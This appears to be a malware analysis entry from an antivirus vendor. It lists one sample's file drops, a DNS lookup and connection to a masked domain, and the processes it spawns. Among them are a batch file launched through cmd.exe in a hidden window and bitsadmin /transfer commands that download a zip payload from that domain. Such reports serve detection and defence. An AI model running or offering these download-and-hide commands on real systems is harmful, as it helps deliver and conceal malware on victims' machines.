Technical Information
- %TEMP%\17c0.tmp\17d0.bat
- <Current directory>\bit23e5.tmp
- <Current directory>\bit23e5.tmp
- from <Current directory>\bit23e5.tmp to <Current directory>\xxfw3215.zip
- 'xx##py.com':80
- http://xx##py.com/download/xxfw3215.zip
- DNS ASK xx##py.com
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\17C0.tmp\17D0.bat <Full path to file>"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\17C0.tmp\17D0.bat <Full path to file>"
- '<SYSTEM32>\cmd.exe' /k bitsadmin.exe /transfer "GET" http://xx##py.com/download/xxfw3215.zip "<Current directory>\xxfw3215.zip"
- '<SYSTEM32>\bitsadmin.exe' /transfer "GET" http://xx##py.com/download/xxfw3215.zip "<Current directory>\xxfw3215.zip"